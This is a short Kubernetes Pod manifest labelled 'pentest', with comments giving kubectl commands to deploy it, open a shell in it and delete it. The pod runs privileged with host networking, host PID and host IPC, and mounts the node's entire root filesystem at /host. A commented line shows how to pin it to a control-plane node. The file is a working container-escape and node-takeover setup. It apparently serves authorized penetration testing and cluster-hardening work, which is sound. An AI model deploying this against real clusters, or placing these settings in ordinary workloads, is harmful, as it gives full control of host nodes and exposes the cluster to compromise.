###########################################################
## Deploy: kubectl -n [namespace] apply -f pod-everything-allowed.yaml 
## Access: kubectl -n [namespace] exec -it pod-everything-allowed -- bash
## Remove: kubectl -n [namespace] delete pod-everything-allowed
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-everything-allowed
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed
    image: ubuntu
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
  volumes:
  - name: noderoot
    hostPath:
      path: /